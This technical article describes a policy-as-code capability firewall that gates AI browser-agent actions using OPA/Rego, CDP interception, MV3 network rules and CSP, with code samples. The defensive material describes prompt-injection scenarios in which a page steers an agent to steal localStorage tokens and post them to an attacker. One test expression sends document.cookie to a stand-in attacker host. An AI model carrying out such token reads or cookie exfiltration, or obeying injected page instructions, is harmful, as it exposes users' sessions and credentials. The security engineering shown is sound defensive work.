Agentic Browser Capability Firewall: Policy-as-Code (OPA/Rego) to Reduce Browser Agent Security Risk in Auto‑Agent AI Browsers
Auto‑agent AI browsers are powerful—and risky. A single prompt injection can steer an agent to exfiltrate tokens from localStorage, wire funds via a finance dashboard, or mass‑spam a CRM. The standard web sandbox constrains sites from each other, but it does not constrain your own automation agent from doing the wrong thing on your behalf.
This article proposes a capability firewall for agentic browsing: a deny‑by‑default policy layer that interposes on browser automation capabilities, evaluates Open Policy Agent (OPA) rules written in Rego, and uses browser isolation primitives (Isolated Worlds, Manifest V3 hooks, CSP) to gate writes, permissions, and data access. The result is a system that is auditable, testable, and CI/CD‑friendly—one you can reason about and evolve with confidence.
We’ll cover:
- Why agentic browsers are a new attack surface
- The security design principles for capability firewalls
- An architecture that wraps the Chrome DevTools Protocol (CDP) with policy checks
- Concrete enforcement points: CDP, MV3 declarativeNetRequest, isolated worlds, CSP/Trusted Types, Permissions, and Storage
- Rego policy examples and testability
- Implementation patterns in Node.js and Go
- Auditability, observability, and CI/CD of policies
- Threat‑driven examples and performance considerations
Opinionated stance: If your AI agent can directly call CDP or mutate the DOM without a policy gate, you don’t have a defensible security model. Put a capability firewall in front of agent actions, or accept that exfiltration and destructive actions are one prompt away.
The Risk: Agentic Browsing Is Capability Amplification
AI agents raise the ceiling of what automation can do inside a browser. With that comes capability amplification:
- Lateral movement across logged‑in sessions and enterprise dashboards
- Silent exfiltration via XHR/fetch, WebRTC, WebSocket, or download channels
- Destructive writes: form submissions, admin setting changes, or mass deletions
- Stealthy persistence through Service Workers or IndexedDB seeds
- Privilege escalation via permission prompts: notifications, clipboard, geolocation, MIDI/HID, file system access
- Prompt injection: a page instructs the agent to perform sensitive actions unrelated to the user’s intent
Traditional mitigations—input sanitization, content validation, even site CSP—don’t address your own agent’s powers. We need agent‑centric capability governance.
Design Principles for a Capability Firewall
- Deny by default: Every privileged action (write, permission change, sensitive read) is blocked unless a policy explicitly allows it.
- Policy‑as‑code: Decisions expressed in Rego, versioned, tested, code‑reviewed, and shipped via CI/CD.
- Interpose on real capabilities: Gate the primitives that actually change the world—CDP commands, network egress, DOM mutations, permission grants, storage writes, and downloads.
- Context‑aware: Decisions consider origin, user, task intent, data classification, time, and environment (CI vs prod).
- Auditable and observable: Every decision logs who/what/why with consistent correlation IDs and OpenTelemetry spans.
- Composable isolation: Use multiple guardrails—CDP interception plus MV3 declarativeNetRequest plus CSP/Trusted Types plus Isolated Worlds. Assume one layer will be bypassed; the system should still hold.
- Fast fail: Keep latency low with local Wasm evaluation and caching so policies don’t become a bottleneck.
Architecture Overview
At its core, the capability firewall wraps the browser control channel and funnels all agent actions through a decision engine.
- Agent code: The untrusted AI controller (planner/executor) that proposes actions (“navigate to …”, “click …”, “evaluate script …”).
- Capability proxy: A wrapper over CDP and DOM primitives that the agent must call. This proxy constructs a decision input and asks OPA for allow/deny.
- OPA/Rego engine: Policy compiled to Wasm or running as a sidecar. Returns allow/deny with obligations (e.g., redact fields, add CSP), plus decision metadata.
- Enforcement adapters:
  - CDP interceptor: Gate commands like Page.navigate, Runtime.evaluate, DOM.setAttributeValue, Input.dispatchKeyEvent, Browser.setPermission, Storage.*.
  - Network gate: Intercept Fetch/XHR via CDP Fetch domain or MV3 declarativeNetRequest to constrain destinations/methods/headers.
  - DOM write guard: For content‑script actions in isolated worlds, wrap or restrict write sinks.
  - Permissions/config: Preconfigure permissions via CDP Browser.setPermission and enforce policy‑driven prompts.
  - CSP/Trusted Types: Inject defense‑in‑depth sink restrictions.
- Audit/telemetry: Structured logs + traces for each decision; persisted to a tamper‑resistant store.
Trust boundary: The agent never holds a raw CDP handle. The only way to act is through the capability proxy, which refuses anything not in policy.
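As a rough illustration of that trust boundary, the sketch below wraps a command sender so the agent only ever receives a gated send function. The names createCapabilityProxy, rawSend, and decide are hypothetical: rawSend stands in for a real CDP session's send method and decide for an OPA evaluation.

```javascript
// Minimal sketch of a deny-by-default capability proxy (illustrative names only).
// `rawSend` stands in for a CDP session's send(); `decide` stands in for OPA.
function createCapabilityProxy(rawSend, decide, context) {
  const audit = [];
  // The agent receives only this frozen object, never rawSend itself.
  return Object.freeze({
    send(cmd, params = {}) {
      const input = { ...context, cmd, args: params };
      const decision = decide(input) || { allow: false };
      audit.push({ cmd, allow: decision.allow === true, reason: decision.reason });
      if (decision.allow !== true) {
        // Synthesized error: the command never reaches the browser.
        return Promise.reject(new Error(decision.reason || `denied: ${cmd}`));
      }
      return Promise.resolve(rawSend(cmd, params));
    },
    auditLog: () => audit.slice(),
  });
}

// Usage with fakes in place of a browser and a policy engine.
const forwarded = [];
const proxy = createCapabilityProxy(
  (cmd) => { forwarded.push(cmd); return { ok: true }; },
  (input) =>
    input.cmd === 'Page.navigate' && input.args.url.startsWith('https://docs.example.com')
      ? { allow: true }
      : { allow: false, reason: `deny ${input.cmd}` },
  { origin: 'about:blank', agent: { id: 'agent-42', task: 'author-doc' } },
);

proxy.send('Page.navigate', { url: 'https://docs.example.com/' });
proxy.send('Runtime.evaluate', { expression: "localStorage.getItem('auth')" })
  .catch((err) => console.warn('Blocked:', err.message));
```

Anything other than an explicit allow of true is treated as a denial, so a malformed or missing decision cannot open the gate.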
Interposing on CDP Actions (The Crux)
CDP is the skeleton key. If the agent has an unrestricted CDP connection, it can do anything a headless user can and more. Wrap it.
High‑value CDP commands to gate:
- Navigation and scripting: Page.navigate, Runtime.evaluate, Page.addScriptToEvaluateOnNewDocument
- DOM and Input: DOM.setAttributeValue, DOM.setAttributesAsText, DOM.performSearch, Input.dispatchKeyEvent, Input.dispatchMouseEvent
- Network: Fetch.enable/disable, Fetch.continueRequest, Network.setExtraHTTPHeaders
- Storage & cookies: Storage.setCookies, Storage.clearDataForOrigin, Network.deleteCookies
- Permissions & sensors: Browser.setPermission, Browser.grantPermissions
- Downloads & file system: Browser.setDownloadBehavior, Page.setDownloadBehavior (deprecated in favor of the Browser variant), File System Access API (via Runtime.evaluate gating)
- Targets: Target.createTarget, Target.attachToTarget (spawns new contexts)
The interceptor computes a policy input something like:
```json
{
  "cmd": "Runtime.evaluate",
  "origin": "https://admin.example.com",
  "frameId": "...",
  "args": { "expression": "localStorage.getItem('auth')" },
  "agent": { "id": "agent-42", "task": "generate-report", "user": "alice@corp" },
  "env": { "stage": "prod", "ts": "2025-01-10T10:00:00Z" },
  "data": { "classification": "high" }
}
```
OPA returns a decision:
```json
{
  "allow": false,
  "reason": "Reading localStorage on admin.example.com is denied for task generate-report",
  "obligations": ["mask-logs"]
}
```
If denied, the proxy fails the CDP call with a synthesized error and logs the event.
Sample Rego Policy: Deny by Default, Allow Narrowly
Here’s a compact but expressive policy that illustrates the approach.
```rego
package browser.capabilities

# `import rego.v1` lets this module load on OPA 0.59+ and on OPA 1.x.
import rego.v1

default allow = false

# Allowlist of navigable origins for the current task
allowed_navigate_origins contains "https://docs.example.com" if {
	input.agent.task == "author-doc"
}

# Deny Runtime.evaluate unless expression is non-mutating and origin is in allowlist.
# The pattern is a raw string: inside double quotes, \b would be a backspace escape.
is_readonly_expression if {
	not contains(input.args.expression, "=")
	not regex.match(`(?i)\b(set|delete|insert|append|push|splice)\b`, input.args.expression)
}

allow if {
	input.cmd == "Page.navigate"
	input.args.url_origin in allowed_navigate_origins
}

allow if {
	input.cmd == "Runtime.evaluate"
	input.origin in allowed_navigate_origins
	is_readonly_expression
}

# Network egress
safe_methods := {"GET"}

internal_hosts := {"api.example.com", "assets.example.com"}

allow if {
	input.cmd == "Fetch.continueRequest"
	input.args.request.method in safe_methods
	input.args.request.url_host in internal_hosts
}

# Writes require explicit capability grants bound to [task, origin, action]
allowed_write_caps := {["update-profile", "https://portal.example.com", "Input.dispatchKeyEvent"]}

allow if [input.agent.task, input.origin, input.cmd] in allowed_write_caps

# Permissions: block clipboard-read unless in CI
# (CDP's PermissionDescriptor carries the permission in its `name` field)
allow if {
	input.cmd == "Browser.setPermission"
	input.args.permission.name == "clipboard-read"
	input.env.stage == "ci"
}

# Annotate decisions
reason := msg if {
	not allow
	msg := sprintf("deny %s on %s for task %s", [input.cmd, input.origin, input.agent.task])
}
```
Notes:
- default allow = false enforces deny‑by‑default.
- Expressions are treated as read‑only unless textually mutating. You’d harden this by parsing ASTs or using code‑aware checks.
- Network egress is allowlisted by method and host.
- Writes and permissions are bound to explicit tasks.
You can exercise this policy with opa test and embed the same data fixtures in unit tests.
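To make the hardening note concrete, here is a small JavaScript port of the textual read‑only heuristic, run against a few expressions. The function name looksReadOnly and the sample expressions are illustrative; the point is only to show which inputs slip past a text‑based check.

```javascript
// JavaScript port of the textual is_readonly_expression heuristic (illustration only).
function looksReadOnly(expression) {
  if (expression.includes('=')) return false;
  return !/\b(set|delete|insert|append|push|splice)\b/i.test(expression);
}

const samples = {
  // Intended behavior
  "localStorage.getItem('auth')": looksReadOnly("localStorage.getItem('auth')"),
  'items.push(1)': looksReadOnly('items.push(1)'),
  'x = 1': looksReadOnly('x = 1'),
  // Mutating or exfiltrating expressions that still look "read-only":
  // "setItem" has no word boundary after "set", so the pattern misses it.
  "localStorage.setItem('k', 'v')": looksReadOnly("localStorage.setItem('k', 'v')"),
  'document.body.remove()': looksReadOnly('document.body.remove()'),
  "navigator.sendBeacon('https://evil.example/c', document.cookie)":
    looksReadOnly("navigator.sendBeacon('https://evil.example/c', document.cookie)"),
  // A harmless comparison that is rejected because it contains "="
  'a === b': looksReadOnly('a === b'),
};

console.table(samples);
```

The heuristic both over‑blocks (comparisons) and under‑blocks (method calls with side effects), which is why the textual check should be treated as a placeholder for AST‑level analysis or a narrower set of permitted expressions.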
Node.js: Wrapping Puppeteer’s CDP Client
Puppeteer drives Chromium over CDP, and Playwright does the same for its Chromium target. A straightforward way to interpose is to wrap client.send() and gate network using the Fetch domain.
```js
import puppeteer from 'puppeteer';
import { OPAWasm } from './opa_wasm.js'; // your own wrapper around the compiled Rego policy

function buildInput(cmd, params, context) {
  const args = { ...params };
  // The sample policy matches on args.url_origin, so derive it for URL-bearing commands.
  if (typeof params.url === 'string') {
    try {
      args.url_origin = new URL(params.url).origin;
    } catch {
      // Unparseable URL: leave url_origin unset so the policy denies.
    }
  }
  return {
    cmd,
    args,
    origin: context.origin,
    frameId: context.frameId,
    agent: context.agent,
    env: context.env,
    data: context.data,
  };
}

async function allowOrThrow(opa, input) {
  // Assumes the wrapper resolves to an object shaped like { allow, reason }.
  const decision = await opa.evaluate('browser/capabilities/allow', input);
  if (!decision.allow) {
    const reason = decision.reason || `Denied: ${input.cmd}`;
    // Emit audit log here
    throw new Error(reason);
  }
}

async function main() {
  const browser = await puppeteer.launch({ headless: 'new' });
  const page = await browser.newPage();

  // Initialize OPA Wasm
  const opa = await OPAWasm.load('policy.wasm');
  const client = await page.target().createCDPSession();
  const originalSend = client.send.bind(client);

  // Context updated on navigation
  const context = {
    origin: 'about:blank',
    frameId: null,
    agent: { id: 'agent-42', task: 'generate-report', user: 'alice@corp' },
    env: { stage: process.env.STAGE || 'dev', ts: new Date().toISOString() },
    data: { classification: 'high' },
  };

  client.on('Page.frameNavigated', (evt) => {
    // Track the top-level frame only; subframe navigations must not overwrite the origin.
    if (evt.frame && evt.frame.url && !evt.frame.parentId) {
      try {
        context.origin = new URL(evt.frame.url).origin;
        context.frameId = evt.frame.id;
      } catch {
        // Ignore URLs that cannot be parsed.
      }
    }
  });

  // Trusted setup runs on the raw channel before the gate is installed.
  await originalSend('Page.enable');
  // Every request, including documents and subresources, passes through this gate,
  // so the policy must allow the hosts a task legitimately loads.
  await originalSend('Fetch.enable', { patterns: [{ urlPattern: '*' }] });

  client.on('Fetch.requestPaused', async (evt) => {
    try {
      const url = new URL(evt.request.url);
      const input = buildInput('Fetch.continueRequest', {
        request: { url_host: url.host, method: evt.request.method, headers: evt.request.headers },
      }, context);
      await allowOrThrow(opa, input);
      await originalSend('Fetch.continueRequest', { requestId: evt.requestId });
    } catch (e) {
      await originalSend('Fetch.failRequest', { requestId: evt.requestId, errorReason: 'BlockedByClient' });
    }
  });

  // Gate all CDP sends
  client.send = async (cmd, params = {}) => {
    const input = buildInput(cmd, params, context);
    await allowOrThrow(opa, input);
    return originalSend(cmd, params);
  };

  // From here on, agent code must go through this gated session
  try {
    await client.send('Page.navigate', { url: 'https://docs.example.com' });
    // Attempt a restricted Runtime.evaluate (will be checked)
    await client.send('Runtime.evaluate', { expression: "localStorage.getItem('token')" });
  } catch (e) {
    console.warn('Blocked:', e.message);
  } finally {
    await browser.close();
  }
}

main().catch(console.error);
```
Key points:
- We intercept all CDP send calls and network requests. The agent code must be forced to use this page/CDP session rather than creating its own.
- Use Wasm‑compiled Rego for sub‑millisecond decisions.
- Attach Page.frameNavigated to track current origin.
For Playwright, a similar approach obtains a CDP session with context.newCDPSession(page) (Chromium only) and wraps its send method, or uses page.route for network gating plus page.on('request') telemetry.
Go: chromedp With Policy Interposition
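If your agent runs in Go, chromedp provides CDP access. The same interposition applies: put a policy check in front of whatever component executes CDP commands. The simplified sketch below gates commands through a wrapper. Its Executor interface is a local stand‑in (in chromedp this role is played by cdp.Executor from the cdproto package, whose exact method signature depends on the version you use), and how you install the wrapper also depends on your chromedp version.

```go
package firewall

import (
	"context"
	"fmt"
)

// Executor is a local stand-in for the command executor of your CDP library.
type Executor interface {
	Execute(ctx context.Context, method string, params, res any) error
}

// Decider is your wrapper around the OPA engine.
type Decider interface {
	Decide(input map[string]any) (allowed bool, reason string)
}

// PolicyExecutor consults policy before forwarding a command to the browser.
type PolicyExecutor struct {
	next Executor
	opa  Decider
}

func (p *PolicyExecutor) Execute(ctx context.Context, method string, params, res any) error {
	// Add origin, agent, and environment fields here, as in the Node.js example.
	input := map[string]any{"cmd": method, "args": params}
	if allowed, reason := p.opa.Decide(input); !allowed {
		return fmt.Errorf("denied %s: %s", method, reason)
	}
	return p.next.Execute(ctx, method, params, res)
}
```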
Use chromedp.ListenTarget to subscribe to Fetch.requestPaused and apply similar policy decisions.
MV3 Hooks: Isolated Worlds, declarativeNetRequest, and Debugger
While CDP interposition is the primary guard, MV3 extensions provide additional controls and better defense‑in‑depth, especially for egress and script sinks.
- Isolated Worlds: Content scripts run in an isolated JS world, so they do not share JavaScript objects with page scripts. Use chrome.scripting.executeScript({ world: 'ISOLATED', ... }) to keep the agent’s logic from casually inheriting page objects. This doesn’t stop DOM writes but reduces attack surface.
- declarativeNetRequest (DNR): Enforce egress rules at the network layer: allowlist hosts, block non‑GET methods, strip headers. DNR is fast and doesn’t require event listeners. You can update dynamic rules based on policy decisions.
- Debugger API: chrome.debugger lets the extension attach to tabs, send CDP commands, and receive CDP events. In the agent scenario your extension is the CDP client, so centralize every command through it and apply the same policy checks there.
Sample MV3 manifest excerpt:
```json
{
  "manifest_version": 3,
  "name": "Agent Capability Firewall",
  "version": "0.1.0",
  "permissions": [
    "declarativeNetRequest",
    "declarativeNetRequestWithHostAccess",
    "scripting",
    "storage",
    "debugger"
  ],
  "host_permissions": ["<all_urls>"],
  "background": { "service_worker": "sw.js" }
}
```
Service worker to enforce default‑deny network egress except allowlisted hosts/methods:
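```js
// sw.js
const BLOCK_RULE_ID = 1;
// DNR classifies both fetch() and XHR as 'xmlhttprequest' ('fetch' is not a valid
// resource type); 'ping' covers navigator.sendBeacon.
const EGRESS_TYPES = ['xmlhttprequest', 'websocket', 'ping'];

chrome.runtime.onInstalled.addListener(async () => {
  await chrome.declarativeNetRequest.updateDynamicRules({
    removeRuleIds: [BLOCK_RULE_ID],
    addRules: [{
      id: BLOCK_RULE_ID,
      priority: 1,
      action: { type: 'block' },
      // No urlFilter: the rule matches every URL of these types, including ws:// and wss://.
      condition: { resourceTypes: EGRESS_TYPES },
    }],
  });
});

async function allowHost(host) {
  // Derive the next free id from the installed rules; a random id could collide.
  const existing = await chrome.declarativeNetRequest.getDynamicRules();
  const id = Math.max(1000, ...existing.map((rule) => rule.id + 1));
  await chrome.declarativeNetRequest.updateDynamicRules({
    addRules: [{
      id,
      priority: 10,
      action: { type: 'allow' },
      condition: { urlFilter: `||${host}^`, resourceTypes: EGRESS_TYPES },
    }],
  });
}
```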
You can drive dynamic allow rules from OPA obligations (e.g., policy grants temporary egress to api.example.com for 5 minutes).
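One way to model such time‑boxed grants is a small bookkeeping table that turns grants and expirations into arguments for updateDynamicRules. The sketch below is plain JavaScript with no extension APIs; createEgressGrants, the rule id range starting at 1000, and the priority value are assumptions made for illustration.

```javascript
// Sketch: track temporary egress grants and produce DNR rule updates for them.
// The returned objects are shaped like the argument to updateDynamicRules().
function createEgressGrants(firstRuleId = 1000) {
  const grants = new Map(); // host -> { ruleId, expiresAt }
  let nextId = firstRuleId;
  return {
    // Record (or extend) a grant and return the rule update that installs it.
    grant(host, ttlMs, now = Date.now()) {
      const existing = grants.get(host);
      const ruleId = existing ? existing.ruleId : nextId++;
      grants.set(host, { ruleId, expiresAt: now + ttlMs });
      return {
        removeRuleIds: [ruleId], // replacing by id keeps re-grants idempotent
        addRules: [{
          id: ruleId,
          priority: 10,
          action: { type: 'allow' },
          condition: { urlFilter: `||${host}^`, resourceTypes: ['xmlhttprequest', 'websocket'] },
        }],
      };
    },
    // Drop expired grants and return the rule ids that should be removed.
    expire(now = Date.now()) {
      const removeRuleIds = [];
      for (const [host, grant] of grants) {
        if (grant.expiresAt <= now) {
          removeRuleIds.push(grant.ruleId);
          grants.delete(host);
        }
      }
      return { removeRuleIds, addRules: [] };
    },
  };
}

// Usage: grant api.example.com for 5 minutes, then sweep.
const egress = createEgressGrants();
const install = egress.grant('api.example.com', 5 * 60 * 1000, 0);
const tooEarly = egress.expire(299999);
const expired = egress.expire(300000);
console.log(install.addRules[0].id, tooEarly.removeRuleIds, expired.removeRuleIds);
```

In a service worker, the sweep would need a durable trigger (for example an alarm) and persisted state, since in‑memory tables do not survive worker restarts.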
CSP and Trusted Types: Clamp the Script Sinks
CSP won’t stop CDP, but it hardens the page when the agent injects content or navigates to untrusted origins. Combine with Trusted Types to block DOM‑XSS sinks.
- Inject a strict CSP on target pages when feasible: block inline scripts, eval, and restrict connect‑src.
- Enforce Trusted Types and supply a vetted policy that only allows templated content you control.
Example CSP header. CSP is delivered with the response, so set it by rewriting response headers, for example with a DNR modifyHeaders rule or CDP Fetch.fulfillRequest; a script injected with Page.addScriptToEvaluateOnNewDocument cannot add HTTP headers:

```http
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'; connect-src 'self' https://api.example.com; require-trusted-types-for 'script'; trusted-types appPolicy
```
Trusted Types bootstrap in the isolated world:
```js
// Install a Trusted Types policy in the agent's isolated world
window.trustedTypes.createPolicy('appPolicy', {
  createHTML: (s) => s, // identity placeholder; use a sanitizer here
});
```
Note: CSP applies per document, and injecting headers requires control at request/response time. For navigations you don’t control, rely on DNR egress rules and CDP gating instead of connect‑src.
Permissions and Storage Governance
The browser permission model is coarse for automation; you should make it explicit in policy.
- Use Browser.setPermission (CDP) to pre‑grant only what’s needed for a given origin/task. Example: clipboard‑write during data export task only.
- Deny permission prompts unless the policy context demands them; surface a human approval gate when appropriate.
- Storage writes: Gate Storage.setCookies, Storage.clearDataForOrigin, and JS APIs that touch localStorage/IndexedDB via Runtime.evaluate decisions. Consider a redaction layer for logs to avoid PII leakage.
Rego snippet to deny localStorage and cookies reads on sensitive origins:
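```rego
# Fragment of package browser.capabilities. The `if` keyword needs
# `import rego.v1` on OPA releases before 1.0.
# allow rules are OR-ed together, so use this in place of any broader
# Runtime.evaluate rule rather than alongside it.
is_sensitive_origin if input.origin == "https://admin.example.com"

allow if {
	input.cmd == "Runtime.evaluate"
	not is_sensitive_origin
	is_readonly_expression
	not contains(input.args.expression, "localStorage")
	not contains(input.args.expression, "document.cookie")
}
```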
DOM Write Guard in Isolated Worlds
Content scripts in isolated worlds can still mutate the DOM. To reduce blast radius, you can instrument common write sinks in the agent’s world and force them through the policy proxy.
Example wrapper (note: this only guards the agent’s own calls, not the page’s):
```js
(function installDomGuard() {
  // Report to the extension service worker. window.postMessage would be visible
  // to, and spoofable by, the page itself.
  const report = (event) =>
    chrome.runtime.sendMessage({ type: 'AGENT_DOM_WRITE', ...event }).catch(() => {});

  const setAttr = Element.prototype.setAttribute;
  Element.prototype.setAttribute = function (name, value) {
    report({ action: 'setAttribute', target: this.tagName, name, valueSnippet: String(value).slice(0, 64) });
    return setAttr.apply(this, arguments);
  };

  const desc = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML');
  Object.defineProperty(Element.prototype, 'innerHTML', {
    set(v) {
      report({ action: 'innerHTML', length: String(v).length });
      return desc.set.call(this, v);
    },
    get: desc.get,
  });
})();
```

Your service worker can listen to these messages (chrome.runtime.onMessage) and consult OPA. Because DOM setters are synchronous, this wrapper can only report a write; it cannot wait for a policy verdict before the write proceeds. For harder enforcement, avoid client‑side monkey‑patching and instead route all agent actions through CDP manipulations controlled by the proxy.
Auditing and Observability
Every decision must be explainable. Emit structured events with:
- decision_id: UUID correlating request, decision, and outcome
- timestamp, agent_id, task, user, env
- resource: origin, frameId, cmd, args hash
- allow/deny, reason, obligations applied
- latency (policy evaluation), caching status
Use OpenTelemetry spans around each CDP command and policy check for end‑to‑end traces. Sink logs to an append‑only store (e.g., cloud logging with retention and immutability controls). Redact sensitive fields (obligation: mask‑logs) to avoid data spills.
Example decision log:
```json
{
  "decision_id": "b6f8c418-3a2c-4ab6-8a0e-109f",
  "agent": { "id": "agent-42", "task": "generate-report", "user": "alice@corp" },
  "cmd": "Runtime.evaluate",
  "origin": "https://admin.example.com",
  "allow": false,
  "reason": "deny Runtime.evaluate on https://admin.example.com for task generate-report",
  "latency_ms": 0.7
}
```
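A record like this could be assembled by a small helper in the proxy. The sketch below uses Node's built‑in crypto module; buildAuditRecord and the args_hash field name are illustrative, and the handling of the mask‑logs obligation is one possible interpretation rather than a fixed contract.

```javascript
const crypto = require('node:crypto');

// Sketch: build a structured audit record for one policy decision.
function buildAuditRecord(input, decision, latencyMs) {
  const obligations = decision.obligations || [];
  const masked = obligations.includes('mask-logs');
  const argsJson = JSON.stringify(input.args ?? {});
  return {
    decision_id: crypto.randomUUID(),
    timestamp: new Date().toISOString(),
    agent: input.agent,
    cmd: input.cmd,
    origin: input.origin,
    // The hash lets you correlate identical arguments without storing them.
    args_hash: crypto.createHash('sha256').update(argsJson).digest('hex'),
    // Raw arguments are logged only when no mask-logs obligation applies.
    args: masked ? undefined : input.args,
    allow: decision.allow === true,
    reason: decision.reason,
    obligations,
    latency_ms: latencyMs,
  };
}

const record = buildAuditRecord(
  {
    cmd: 'Runtime.evaluate',
    origin: 'https://admin.example.com',
    args: { expression: "localStorage.getItem('auth')" },
    agent: { id: 'agent-42', task: 'generate-report', user: 'alice@corp' },
  },
  { allow: false, reason: 'denied by policy', obligations: ['mask-logs'] },
  0.7,
);
console.log(JSON.stringify(record, null, 2));
```

JSON.stringify drops the undefined args field, so masked records never carry the raw expression into the log sink.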
Testing Policies: Unit, Property, and Replay
- Unit tests with opa test: Embed decision inputs for common scenarios and edge cases.
- Property tests: Generate random variations of URLs, headers, and methods to ensure no allowlist regex escapes.
- CDP trace replay: Record CDP sessions (commands + events) from safe and malicious tasks; replay against your policy to validate decisions without a live browser.
- Golden files: For high‑risk flows (e.g., payment, admin), maintain reviewed fixtures and expected decisions.
Example OPA test:
```rego
package browser.capabilities_test

import rego.v1

import data.browser.capabilities

# Deny localStorage read on admin origin.
# The fixture has its own name: a rule may not be called `input`.
admin_storage_read := {
	"cmd": "Runtime.evaluate",
	"args": {"expression": "localStorage.getItem('t')"},
	"origin": "https://admin.example.com",
	"agent": {"task": "generate-report"},
}

test_deny_localstorage_on_admin if {
	not capabilities.allow with input as admin_storage_read
}
```
Integrate with CI to run policy tests, enforce coverage, and block merges on regressions.
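The trace replay idea can be prototyped without a browser. In the sketch below, a recorded trace is just an array of policy inputs paired with the expected verdict; replayTrace, the trace format, and toyDecide (a stand‑in for the real policy evaluation) are assumptions for illustration.

```javascript
// Sketch: replay recorded policy inputs against a decision function and
// report every entry whose verdict differs from the reviewed expectation.
function replayTrace(trace, decide) {
  const mismatches = [];
  trace.forEach((entry, index) => {
    const actual = decide(entry.input).allow === true;
    if (actual !== entry.expectAllow) {
      mismatches.push({ index, cmd: entry.input.cmd, expected: entry.expectAllow, actual });
    }
  });
  return mismatches;
}

// A tiny "golden" trace: one safe navigation, one malicious storage read.
const trace = [
  {
    input: { cmd: 'Page.navigate', args: { url_origin: 'https://docs.example.com' }, agent: { task: 'author-doc' } },
    expectAllow: true,
  },
  {
    input: {
      cmd: 'Runtime.evaluate',
      origin: 'https://admin.example.com',
      args: { expression: "localStorage.getItem('t')" },
      agent: { task: 'generate-report' },
    },
    expectAllow: false,
  },
];

// Stand-in for the real policy; in practice this would call the Wasm policy.
const toyDecide = (input) => ({
  allow:
    input.cmd === 'Page.navigate' &&
    input.args.url_origin === 'https://docs.example.com' &&
    input.agent.task === 'author-doc',
});

const regressions = replayTrace(trace, toyDecide);
const withBadPolicy = replayTrace(trace, () => ({ allow: true }));
console.log(regressions.length, withBadPolicy);
```

A CI job can fail the build whenever the mismatch list is non‑empty, which turns reviewed traces into regression tests for policy changes.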
CI/CD for Policy-as-Code
- Version policies in Git with code owners and mandatory review.
- Build: Compile Rego to Wasm (opa build -t wasm -e browser/capabilities/allow policy.rego).
- Scan: Lint Rego (for example with opa check --strict or Regal) and run opa test.
- Artifact: Publish versioned Wasm to your registry.
- Deploy: Roll out to the capability proxy; support canary by agent group or environment.
- Runtime toggles: Feature flags for policy paths and emergency brakes (e.g., fail‑open only in non‑prod with alerts).
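The emergency‑brake behavior in the last item can be expressed as a thin wrapper around the decision call. This is a sketch under stated assumptions: decideWithFailMode, the stage values, and the alert callback are hypothetical names, and decide stands in for the real policy evaluation.

```javascript
// Sketch: fail closed in prod, fail open (with an alert) elsewhere when the
// policy engine throws or returns something that is not a decision.
function decideWithFailMode(decide, input, { stage, alert = () => {} }) {
  try {
    const decision = decide(input);
    if (decision && typeof decision.allow === 'boolean') return decision;
    throw new Error('malformed policy decision');
  } catch (err) {
    alert({ cmd: input.cmd, stage, error: err.message });
    const allow = stage !== 'prod';
    return {
      allow,
      reason: `policy engine error (${allow ? 'fail-open' : 'fail-closed'})`,
    };
  }
}

// Usage with a policy engine that is broken on purpose.
const alerts = [];
const brokenDecide = () => { throw new Error('wasm module failed to load'); };
const inProd = decideWithFailMode(brokenDecide, { cmd: 'Page.navigate' }, { stage: 'prod', alert: (a) => alerts.push(a) });
const inDev = decideWithFailMode(brokenDecide, { cmd: 'Page.navigate' }, { stage: 'dev', alert: (a) => alerts.push(a) });
console.log(inProd, inDev, alerts.length);
```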
Threat-Driven Examples
- Prompt Injection to Exfiltrate Tokens
  - Scenario: Agent visits a public site that instructs it to read localStorage on admin.example.com and POST to an attacker server.
  - Policy: Deny Runtime.evaluate that references storage on sensitive origins; block non‑GET network egress to external hosts.
  - Outcome: Decision denies both the read and the POST; audit logs flag the attempt.
- Misconfigured Download Flood
  - Scenario: Agent scrapes a directory and auto‑downloads hundreds of PDFs, filling disk.
  - Policy: Gate Browser.setDownloadBehavior and total download count per task; require explicit quota in obligations.
  - Outcome: After N downloads, deny further ones; emit alert.
- Permission Escalation
  - Scenario: Agent tries to grant geolocation to a site to unlock functionality.
  - Policy: Only allow Browser.setPermission for clipboard-write during export tasks; deny geolocation in prod.
  - Outcome: Denied; audit log explains reason.
- Destructive Admin Action
  - Scenario: Agent hits an admin dashboard and clicks “Delete All Users.”
  - Policy: Deny Input.dispatchMouseEvent for click targets whose accessible name matches destructive patterns unless a human approval token is present; or require a two‑phase commit where the agent proposes a patch (diff) for a human to approve.
  - Outcome: Blocked; optionally surface approval UX for a supervisor.
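The destructive‑action check from the last example might look like the sketch below. It assumes the proxy has already resolved the click target's accessible name (for instance through the CDP Accessibility domain) before asking for a verdict; checkDestructiveClick, the word list, and the token validator are illustrative, not a complete classifier.

```javascript
// Sketch: block clicks on destructively named controls unless a valid human
// approval token accompanies the request. The word list is an assumption.
const DESTRUCTIVE_NAME = /\b(delete|remove|destroy|purge|wipe|revoke)\b/i;

function checkDestructiveClick(click, isApproved) {
  const name = click.accessibleName || '';
  if (!DESTRUCTIVE_NAME.test(name)) {
    // Not destructive by name; other policy rules still apply.
    return { ok: true };
  }
  if (click.approvalToken && isApproved(click.approvalToken)) {
    return { ok: true, obligations: ['log-approval'] };
  }
  return {
    ok: false,
    reason: `"${name}" requires human approval`,
    obligations: ['request-approval'],
  };
}

// Usage with a toy token validator.
const validTokens = new Set(['approved-by-supervisor-123']);
const isApproved = (token) => validTokens.has(token);

const blocked = checkDestructiveClick({ accessibleName: 'Delete All Users' }, isApproved);
const approved = checkDestructiveClick(
  { accessibleName: 'Delete All Users', approvalToken: 'approved-by-supervisor-123' },
  isApproved,
);
const harmless = checkDestructiveClick({ accessibleName: 'Save draft' }, isApproved);
console.log(blocked, approved, harmless);
```

Name matching is easy to evade with icon‑only buttons or unusual labels, so it works best as one signal next to origin‑ and task‑level restrictions.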
Performance Considerations
- Wasm OPA: Evaluate in‑process, typically well under a millisecond for small policies; preload policies and prepare inputs to minimize allocations.
- Decision caching: Cache per (cmd, origin, task) where safe; invalidate on context changes (e.g., new origin, user, or policy version).
- Batch network decisions: For large asset loads, short‑circuit safe static resources (images, css) via DNR rules, not CDP.
- Avoid chatty policies: Keep input payloads small; hash large expressions and attach only the hash in logs.
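Decision caching can be sketched as a keyed map in front of the policy call. In the example below the cache key includes the policy version, origin, task, and user, so a change in any of them naturally misses the cache; createDecisionCache and the cacheable flag (set by the caller only for decisions that do not depend on command arguments) are assumptions for illustration.

```javascript
// Sketch: cache decisions per (policyVersion, cmd, origin, task, user).
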